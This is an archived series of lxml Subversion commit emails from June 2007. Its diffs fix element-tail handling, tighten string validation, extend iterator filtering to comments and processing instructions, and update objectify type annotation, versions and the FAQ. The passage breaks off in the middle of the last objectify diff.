src/lxml src/lxml/tests Message-ID: <20070612174615.985E081A5@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:46:15 2007 New Revision: 44199 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tree.pxd Log: merged in trunk fixes from revs 44117 and 44165 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 19:46:15 2007 @@ -22,6 +22,12 @@ Bugs fixed ---------- +* Replacing the children slice of an Element would cut off the tails of the + original children + +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted. + * XSLT parsing failed to pass resolver context on to imported documents * More ET compatible behaviour when writing out XML declarations or not Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 19:46:15 2007 @@ -462,7 +462,10 @@ cdef void _removeNode(xmlNode* c_node): """Unlink and free a node and subnodes if possible. 
""" + cdef xmlNode* c_next + c_next = c_node.next tree.xmlUnlinkNode(c_node) + _moveTail(c_next, c_node) attemptDeallocation(c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): @@ -503,8 +506,8 @@ while c_node is not NULL and c < stop: c_next = c_node.next if _isElement(c_node): - _removeText(c_node.next) - c_next = c_node.next + while c_next is not NULL and not _isElement(c_next): + c_next = c_next.next _removeNode(c_node) c = c + 1 c_node = c_next @@ -572,16 +575,20 @@ cdef char* s cdef char* c_end cdef char c + cdef int is_non_ascii s = _cstr(pystring) c_end = s + python.PyString_GET_SIZE(pystring) + is_non_ascii = 0 while s < c_end: c = s[0] + if c & 0x80: + is_non_ascii = 1 if c == c'\0': return -1 # invalid! - if c & 0x80: - return 1 # non-ASCII + if is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + return -1 # invalid! s = s + 1 - return 0 # plain 7-bit ASCII + return is_non_ascii cdef object funicode(char* s): cdef Py_ssize_t slen @@ -602,12 +609,15 @@ cdef object _utf8(object s): if python.PyString_Check(s): assert not isutf8py(s), \ - "All strings must be Unicode or ASCII" - return s + "All strings must be XML compatible, either Unicode or ASCII" elif python.PyUnicode_Check(s): - return python.PyUnicode_AsUTF8String(s) + # FIXME: we should test these strings, too ... + s = python.PyUnicode_AsUTF8String(s) + assert isutf8py(s) != -1, \ + "All strings must be XML compatible, either Unicode or ASCII" else: raise TypeError, "Argument must be string or unicode." 
+ return s cdef object _encodeFilename(object filename): if filename is None: Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 19:46:15 2007 @@ -480,7 +480,7 @@ else: c_node = _findChild(self._c_node, start) # now delete the slice - if start != stop: + if c_node is not NULL and start != stop: c_node = _deleteSlice(c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: @@ -591,8 +591,8 @@ while c_node is not NULL: c_node_next = c_node.next if _isElement(c_node): - _removeText(c_node_next) - c_node_next = c_node.next + while c_node_next is not NULL and not _isElement(c_node_next): + c_node_next = c_node_next.next _removeNode(c_node) c_node = c_node_next Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Tue Jun 12 19:46:15 2007 @@ -1151,6 +1151,26 @@ self.assertXML('', b) self.assertXML('', c) + def test_delslice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + del a[:] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + + def test_replace_slice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + a[:] = [] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + def test_delitem_tail(self): ElementTree = self.etree.ElementTree f = StringIO('B2C2') Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py Tue Jun 12 19:46:15 2007 @@ -1388,6 +1388,41 @@ 
self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_unicode_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\0ho') + + self.assertRaises(AssertionError, Element, u'ha\0ho') + + def test_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x02ho') + + self.assertRaises(AssertionError, Element, 'ha\x07ho') + self.assertRaises(AssertionError, Element, 'ha\x02ho') + + def test_unicode_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x02ho') + + self.assertRaises(AssertionError, Element, u'ha\x07ho') + self.assertRaises(AssertionError, Element, u'ha\x02ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring Modified: lxml/branch/lxml-1.3/src/lxml/tree.pxd ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tree.pxd (original) +++ lxml/branch/lxml-1.3/src/lxml/tree.pxd Tue Jun 12 19:46:15 2007 @@ -41,6 +41,9 @@ cdef xmlCharEncoding xmlDetectCharEncoding(char* text, int len) cdef char* xmlGetCharEncodingName(xmlCharEncoding enc) +cdef extern from "libxml/chvalid.h": + cdef int xmlIsChar_ch(char c) + cdef extern from "libxml/hash.h": ctypedef struct xmlHashTable ctypedef void xmlHashScanner(void* payload, void* data, char* name) 
From scoder at codespeak.net Tue Jun 12 19:51:41 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:51:41 +0200 (CEST) Subject: [Lxml-checkins] r44200 - lxml/trunk Message-ID: <20070612175141.EDE5981A5@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:51:41 2007 New Revision: 44200 Modified: lxml/trunk/version.txt Log: bump the trunk version 2.0dev Modified: lxml/trunk/version.txt ============================================================================== --- lxml/trunk/version.txt (original) +++ lxml/trunk/version.txt Tue Jun 12 19:51:41 2007 @@ -1 +1 @@ -1.3beta +2.0dev From scoder at codespeak.net Tue Jun 12 19:51:56 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 19:51:56 +0200 (CEST) Subject: [Lxml-checkins] r44201 - lxml/branch/lxml-1.3 Message-ID: <20070612175156.71DB181A5@code0.codespeak.net> Author: scoder Date: Tue Jun 12 19:51:56 2007 New Revision: 44201 Modified: lxml/branch/lxml-1.3/version.txt Log: bump the branch version 1.3 Modified: lxml/branch/lxml-1.3/version.txt ============================================================================== --- lxml/branch/lxml-1.3/version.txt (original) +++ lxml/branch/lxml-1.3/version.txt Tue Jun 12 19:51:56 2007 @@ -1 +1 @@ -1.3beta +1.3 From scoder at codespeak.net Tue Jun 12 21:13:14 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:13:14 +0200 (CEST) Subject: [Lxml-checkins] r44202 - lxml/branch/lxml-1.3 Message-ID: <20070612191314.25DE18184@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:13:12 2007 New Revision: 44202 Modified: lxml/branch/lxml-1.3/setup.py Log: require setuptools 0.6c6 Modified: lxml/branch/lxml-1.3/setup.py ============================================================================== --- lxml/branch/lxml-1.3/setup.py (original) +++ lxml/branch/lxml-1.3/setup.py Tue Jun 12 21:13:12 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools 
-use_setuptools(version="0.5") +use_setuptools(version="0.6c6") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 21:13:22 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:13:22 +0200 (CEST) Subject: [Lxml-checkins] r44203 - lxml/trunk Message-ID: <20070612191322.3E7CF8198@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:13:21 2007 New Revision: 44203 Modified: lxml/trunk/setup.py Log: require setuptools 0.6c6 Modified: lxml/trunk/setup.py ============================================================================== --- lxml/trunk/setup.py (original) +++ lxml/trunk/setup.py Tue Jun 12 21:13:21 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.5") +use_setuptools(version="0.6c6") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 21:39:45 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:39:45 +0200 (CEST) Subject: [Lxml-checkins] r44205 - lxml/branch/lxml-1.3 Message-ID: <20070612193945.503BF8197@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:39:45 2007 New Revision: 44205 Modified: lxml/branch/lxml-1.3/setup.py Log: setuptools version: 0.6c5 is enough Modified: lxml/branch/lxml-1.3/setup.py ============================================================================== --- lxml/branch/lxml-1.3/setup.py (original) +++ lxml/branch/lxml-1.3/setup.py Tue Jun 12 21:39:45 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.6c6") +use_setuptools(version="0.6c5") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 21:39:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 21:39:52 +0200 (CEST) Subject: [Lxml-checkins] r44206 - lxml/trunk Message-ID: <20070612193952.C9B36819A@code0.codespeak.net> Author: scoder Date: Tue Jun 12 21:39:52 2007 New Revision: 44206 Modified: 
lxml/trunk/setup.py Log: setuptools version: 0.6c5 is enough Modified: lxml/trunk/setup.py ============================================================================== --- lxml/trunk/setup.py (original) +++ lxml/trunk/setup.py Tue Jun 12 21:39:52 2007 @@ -1,5 +1,5 @@ from ez_setup import use_setuptools -use_setuptools(version="0.6c6") +use_setuptools(version="0.6c5") from setuptools import setup import sys, os From scoder at codespeak.net Tue Jun 12 22:18:08 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 22:18:08 +0200 (CEST) Subject: [Lxml-checkins] r44207 - in lxml/branch/lxml-1.3: . src/lxml src/lxml/tests Message-ID: <20070612201808.346068193@code0.codespeak.net> Author: scoder Date: Tue Jun 12 22:18:06 2007 New Revision: 44207 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Log: support Comment and ProcessingInstruction elements in el.getiterator() Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Tue Jun 12 22:18:06 2007 @@ -25,6 +25,9 @@ * Replacing the children slice of an Element would cut off the tails of the original children +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags + * API functions now check incoming strings for XML conformity. Zero bytes or low ASCII characters are no longer accepted. 
Modified: lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi (original) +++ lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi Tue Jun 12 22:18:06 2007 @@ -436,6 +436,9 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node.type != tree.XML_ELEMENT_NODE: + # not an element, only succeed if we match everything + return c_name is NULL and c_href is NULL if c_name is NULL: if c_href is NULL: # always match Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Tue Jun 12 22:18:06 2007 @@ -1596,17 +1596,22 @@ cdef public class _ElementTagMatcher [ object LxmlElementTagMatcher, type LxmlElementTagMatcherType ]: cdef object _pystrings + cdef int _node_type cdef char* _href cdef char* _name cdef _initTagMatch(self, tag): + self._href = NULL + self._name = NULL if tag is None: - self._href = NULL - self._name = NULL + self._node_type = 0 + elif tag is Comment: + self._node_type = tree.XML_COMMENT_NODE + elif tag is ProcessingInstruction: + self._node_type = tree.XML_PI_NODE else: + self._node_type = tree.XML_ELEMENT_NODE self._pystrings = _getNsTag(tag) - if self._pystrings[0] is None: - self._href = NULL - else: + if self._pystrings[0] is not None: self._href = _cstr(self._pystrings[0]) self._name = _cstr(self._pystrings[1]) if self._name[0] == c'*' and self._name[1] == c'\0': @@ -1624,7 +1629,9 @@ cdef xmlNode* c_node c_node = self._next_element(node._c_node) while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is NULL: self._node = None @@ -1655,7 +1662,9 @@ 
self._next_element = _nextElement if tag is not None: while c_node is not NULL and \ - not _tagMatches(c_node, self._href, self._name): + self._node_type != 0 and \ + (self._node_type != c_node.type or + not _tagMatches(c_node, self._href, self._name)): c_node = self._next_element(c_node) if c_node is not NULL: # store Python ref: @@ -1702,9 +1711,11 @@ self._top_node = node self._next_node = node self._initTagMatch(tag) - if tag is not None and \ - not _tagMatches(node._c_node, self._href, self._name) or \ - not inclusive: + if not inclusive or \ + tag is not None and \ + self._node_type != 0 and \ + (self._node_type != node._c_node.type or + not _tagMatches(node._c_node, self._href, self._name)): # this cannot raise StopIteration, self._next_node != None self.next() @@ -1727,7 +1738,8 @@ cdef xmlNode* _nextNodeAnyTag(self, xmlNode* c_node): tree.BEGIN_FOR_EACH_ELEMENT_FROM(self._top_node._c_node, c_node, 0) - return c_node + if self._node_type == 0 or self._node_type == c_node.type: + return c_node tree.END_FOR_EACH_ELEMENT_FROM(c_node) return NULL Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_elementtree.py Tue Jun 12 22:18:06 2007 @@ -1429,6 +1429,56 @@ [a2], list(c.getiterator('a'))) + def test_getiterator_filter_comment(self): + Element = self.etree.Element + Comment = self.etree.Comment + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + comment_b = Comment("TEST-b") + b.append(comment_b) + + self.assertEquals( + [comment_b], + list(a.getiterator(Comment))) + + comment_a = Comment("TEST-a") + a.append(comment_a) + + self.assertEquals( + [comment_b, comment_a], + list(a.getiterator(Comment))) + + self.assertEquals( + [comment_b], + list(b.getiterator(Comment))) + + def test_getiterator_filter_pi(self): + Element = 
self.etree.Element + PI = self.etree.ProcessingInstruction + SubElement = self.etree.SubElement + + a = Element('a') + b = SubElement(a, 'b') + pi_b = PI("TEST-b") + b.append(pi_b) + + self.assertEquals( + [pi_b], + list(a.getiterator(PI))) + + pi_a = PI("TEST-a") + a.append(pi_a) + + self.assertEquals( + [pi_b, pi_a], + list(a.getiterator(PI))) + + self.assertEquals( + [pi_b], + list(b.getiterator(PI))) + def test_getiterator_with_text(self): Element = self.etree.Element SubElement = self.etree.SubElement From scoder at codespeak.net Tue Jun 12 23:48:23 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:48:23 +0200 (CEST) Subject: [Lxml-checkins] r44216 - lxml/trunk/src/lxml/tests Message-ID: <20070612214823.DA8DC81A6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:48:23 2007 New Revision: 44216 Modified: lxml/trunk/src/lxml/tests/test_htmlparser.py Log: test refactored to maybe make it work better on different systems Modified: lxml/trunk/src/lxml/tests/test_htmlparser.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_htmlparser.py (original) +++ lxml/trunk/src/lxml/tests/test_htmlparser.py Tue Jun 12 23:48:23 2007 @@ -30,7 +30,7 @@ def test_module_HTML_unicode(self): element = self.etree.HTML(self.uhtml_str) self.assertEqual(unicode(self.etree.tostring(element, 'UTF8'), 'UTF8'), - self.uhtml_str) + unicode(self.uhtml_str.encode('UTF8'), 'UTF8')) def test_module_parse_html_error(self): parser = self.etree.HTMLParser(recover=False) From scoder at codespeak.net Tue Jun 12 23:49:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:49:12 +0200 (CEST) Subject: [Lxml-checkins] r44217 - lxml/trunk/doc Message-ID: <20070612214912.0805D81B4@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:49:11 2007 New Revision: 44217 Modified: lxml/trunk/doc/FAQ.txt Log: FAQ: which lib versions to use? 
Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Tue Jun 12 23:49:11 2007 @@ -18,10 +18,11 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Where are the Windows binaries? - 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 How can I make my application run faster? - 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? + 1.4 Which version of libxml2 and libxslt should I use or require? + 1.5 Where are the Windows binaries? + 1.6 What is the difference between lxml.etree and lxml.objectify? + 1.7 How can I make my application run faster? + 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? 2 Contributing 2.1 Why is lxml not written in Python? 2.2 How can I contribute? @@ -91,6 +92,33 @@ supports loading documents through HTTP and FTP. +Which version of libxml2 and libxslt should I use or require? +------------------------------------------------------------- + +It really depends on your application, but the rule of thumb is: more recent +versions contain less bugs and provide more features. + +* Try to use versions of both libraries that were released together. + +* If you use XML Schema or Schematron which are still under development, the +most recent version of libxml2 is usually a good bet. + +* The same applies to XPath, where a substantial number of bugs and memory +leaks were fixed over time. If you encounter crashes or memory leaks in XPath +applications, try a more recent version of libxml2. + +* For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. + +* For the normal tree handling, however, any libxml2 version starting with +2.6.16 should do. + +Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to +see if a specific bug has been fixed. + +.. 
_`release notes of libxml2`: http://xmlsoft.org/news.html +.. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html + + Where are the Windows binaries? ------------------------------- From scoder at codespeak.net Tue Jun 12 23:51:21 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:51:21 +0200 (CEST) Subject: [Lxml-checkins] r44218 - lxml/branch/lxml-1.3/doc Message-ID: <20070612215121.9463181B6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:51:21 2007 New Revision: 44218 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: FAQ update from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 12 23:51:21 2007 @@ -13,10 +13,11 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Where are the Windows binaries? - 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 How can I make my application run faster? - 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? + 1.4 Which version of libxml2 and libxslt should I use or require? + 1.5 Where are the Windows binaries? + 1.6 What is the difference between lxml.etree and lxml.objectify? + 1.7 How can I make my application run faster? + 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? 2 Contributing 2.1 Why is lxml not written in Python? 2.2 How can I contribute? @@ -86,6 +87,33 @@ supports loading documents through HTTP and FTP. +Which version of libxml2 and libxslt should I use or require? +------------------------------------------------------------- + +It really depends on your application, but the rule of thumb is: more recent +versions contain less bugs and provide more features. + +* Try to use versions of both libraries that were released together. 
+ +* If you use XML Schema or Schematron which are still under development, the +most recent version of libxml2 is usually a good bet. + +* The same applies to XPath, where a substantial number of bugs and memory +leaks were fixed over time. If you encounter crashes or memory leaks in XPath +applications, try a more recent version of libxml2. + +* For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. + +* For the normal tree handling, however, any libxml2 version starting with +2.6.16 should do. + +Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to +see if a specific bug has been fixed. + +.. _`release notes of libxml2`: http://xmlsoft.org/news.html +.. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html + + Where are the Windows binaries? ------------------------------- From scoder at codespeak.net Tue Jun 12 23:51:49 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 12 Jun 2007 23:51:49 +0200 (CEST) Subject: [Lxml-checkins] r44219 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070612215149.81A3981B6@code0.codespeak.net> Author: scoder Date: Tue Jun 12 23:51:49 2007 New Revision: 44219 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py Log: test update from trunk Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_htmlparser.py Tue Jun 12 23:51:49 2007 @@ -30,7 +30,7 @@ def test_module_HTML_unicode(self): element = self.etree.HTML(self.uhtml_str) self.assertEqual(unicode(self.etree.tostring(element, 'UTF8'), 'UTF8'), - self.uhtml_str) + unicode(self.uhtml_str.encode('UTF8'), 'UTF8')) def test_module_parse_html_error(self): parser = self.etree.HTMLParser(recover=False) From scoder at codespeak.net Wed Jun 13 14:48:23 2007 From: scoder at codespeak.net (scoder at 
codespeak.net) Date: Wed, 13 Jun 2007 14:48:23 +0200 (CEST) Subject: [Lxml-checkins] r44230 - in lxml/branch/lxml-1.3: . doc src/lxml src/lxml/tests Message-ID: <20070613124823.4F2E881FC@code0.codespeak.net> Author: scoder Date: Wed Jun 13 14:48:21 2007 New Revision: 44230 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/doc/objectify.txt lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: Holger's objectify.deannotate() and some cleanup in objectify.pyx Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Wed Jun 13 14:48:21 2007 @@ -11,6 +11,9 @@ * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node +* Extended type annotation in objectify: cleaner annotation namespace setup + plus new ``xsiannotate()`` and ``deannotate()`` functions + * Element.attrib now has a ``pop()`` method * Support for custom Element class instantiation in lxml.sax: passing a Modified: lxml/branch/lxml-1.3/doc/objectify.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/objectify.txt (original) +++ lxml/branch/lxml-1.3/doc/objectify.txt Wed Jun 13 14:48:21 2007 @@ -699,6 +699,34 @@ s = '5' [StringElement] * xsi:type = 'string' +The utility function ``deannotate()`` can be used to get rid of 'py:pytype' +and/or 'xsi:type' information:: + + >>> root = objectify.fromstring('''\ + ... + ... 5 + ... 5 + ... 5 + ... 
''') + >>> objectify.annotate(root) + >>> print objectify.dump(root) + root = None [ObjectifiedElement] + d = 5.0 [FloatElement] + * xsi:type = 'double' + * py:pytype = 'float' + l = 5L [LongElement] + * xsi:type = 'long' + * py:pytype = 'long' + s = '5' [StringElement] + * xsi:type = 'string' + * py:pytype = 'str' + >>> objectify.deannotate(root) + >>> print objectify.dump(root) + root = None [ObjectifiedElement] + d = 5 [IntElement] + l = 5 [IntElement] + s = 5 [IntElement] + For convenience, the ``DataElement()`` factory creates an Element with a Python value in one step. You can pass the required Python type name or the XSI type name:: @@ -720,8 +748,8 @@ >>> root.x = objectify.DataElement(5, _xsi="integer") >>> print objectify.dump(root) root = None [ObjectifiedElement] - x = 5 [IntElement] - * py:pytype = 'int' + x = 5L [LongElement] + * py:pytype = 'long' * xsi:type = 'integer' There is a side effect of the type lookup. If you assign a string value using Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Wed Jun 13 14:48:21 2007 @@ -707,17 +707,21 @@ """Boolean type base on string values: 'true' or 'false'. 
""" cdef int _boolval(self) except -1: + cdef char* c_str text = textOf(self._c_node) if text is None: return 0 - text = text.lower() - if text == 'false': - return 0 - elif text == 'true': - return 1 - else: - raise ValueError, "Invalid boolean value: '%s'" % text - + c_str = _cstr(text) + if c_str[0] == c'0' or c_str[0] == c'f' or c_str[0] == c'F': + if c_str[1] == c'\0' or text == "false" or text.lower() == "false": + # '0' or 'f' or 'false' + return 0 + elif c_str[0] == c'1' or c_str[0] == c't' or c_str[0] == c'T': + if c_str[1] == c'\0' or text == "true" or text.lower() == "true": + # '1' or 't' or 'true' + return 1 + raise ValueError, "Invalid boolean value: '%s'" % text + def __nonzero__(self): if self._boolval(): return True @@ -882,13 +886,15 @@ cdef _registerPyTypes(): pytype = PyType('int', int, IntElement) - pytype.xmlSchemaTypes = ("integer", "positiveInteger", "negativeInteger", - "nonNegativeInteger", "nonPositiveInteger", - "int", "unsignedInt", "short", "unsignedShort") + pytype.xmlSchemaTypes = ("int", "short", "byte", "unsignedShort", + "unsignedByte",) + pytype.register() pytype = PyType('long', long, LongElement) - pytype.xmlSchemaTypes = ("long", "unsignedLong") + pytype.xmlSchemaTypes = ("integer", "nonPositiveInteger", "negativeInteger", + "long", "nonNegativeInteger", "unsignedLong", + "unsignedInt", "positiveInteger",) pytype.register() pytype = PyType('float', float, FloatElement) @@ -900,7 +906,9 @@ pytype.register() pytype = PyType('str', None, StringElement) - pytype.xmlSchemaTypes = ("string", "normalizedString") + pytype.xmlSchemaTypes = ("string", "normalizedString", "token", "language", + "Name", "NCName", "ID", "IDREF", "ENTITY", + "NMTOKEN", ) pytype.register() pytype = PyType('none', None, NoneElement) @@ -936,12 +944,25 @@ python.PyList_Append(types, pytype) return types +cdef PyType _guessPyType(value, PyType defaulttype): + if value is None: + return None + for type_check, tested_pytype in _TYPE_CHECKS: + try: + 
type_check(value) + return tested_pytype + except IGNORABLE_ERRORS: + # could not be parsed as the specififed type => ignore + pass + return defaulttype + cdef object _guessElementClass(tree.xmlNode* c_node): value = textOf(c_node) if value is None: return None if value == '': return StringElement + for type_check, pytype in _TYPE_CHECKS: try: type_check(value) @@ -1424,11 +1445,26 @@ ################################################################################ # Type annotations +cdef PyType _check_type(tree.xmlNode* c_node, PyType pytype): + # StrType does not have a typecheck but is the default anyway, + # so just accept it if given as type information + if pytype is None: + return pytype + value = textOf(c_node) + try: + pytype.type_check(value) + return pytype + except IGNORABLE_ERRORS: + # could not be parsed as the specified type => ignore + pass + return None + + def annotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'pytype' attributes. - If the 'ignore_old' keyword argument is True (the default), current + If the 'ignore_old' keyword argument is True (the default), current 'pytype' attributes will be ignored and replaced. Otherwise, they will be checked and only replaced if they no longer fit the current text value. 
""" @@ -1438,11 +1474,13 @@ cdef tree.xmlNode* c_node cdef tree.xmlNs* c_ns cdef python.PyObject* dict_result + cdef PyType pytype element = cetree.rootNodeOrRaise(element_or_tree) doc = element._doc ignore = bool(ignore_old) - StrType = _PYTYPE_DICT.get('str') + StrType = _PYTYPE_DICT.get('str') + NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) pytype = None @@ -1452,20 +1490,19 @@ old_value = cetree.attributeValueFromNsName( c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) if old_value is not None and old_value != TREE_PYTYPE: - pytype = _PYTYPE_DICT.get(old_value) - if pytype is not None: - value = textOf(c_node) - try: - if not (pytype).type_check(value): - pytype = None - except ValueError: - pytype = None + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, old_value) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not have a typecheck but is the default anyway, + # so just accept it if given as type information + pytype = _check_type(c_node, pytype) if pytype is None: - # if element is defined as xsi:nil, return NoneElement class + # if element is defined as xsi:nil, represent it as None if cetree.attributeValueFromNsName( c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = _PYTYPE_DICT.get("none") + pytype = NoneType if pytype is None: # check for XML Schema type hint @@ -1481,18 +1518,7 @@ # try to guess type if cetree.findChildForwards(c_node, 0) is NULL: # element has no children => data class - if value is None: - value = textOf(c_node) - if value is not None: - for type_check, tested_pytype in _TYPE_CHECKS: - try: - if type_check(value) is not False: - pytype = tested_pytype - break - except ValueError: - pass - else: - pytype = StrType + pytype = _guessPyType(textOf(c_node), StrType) if pytype is None: # delete attribute if 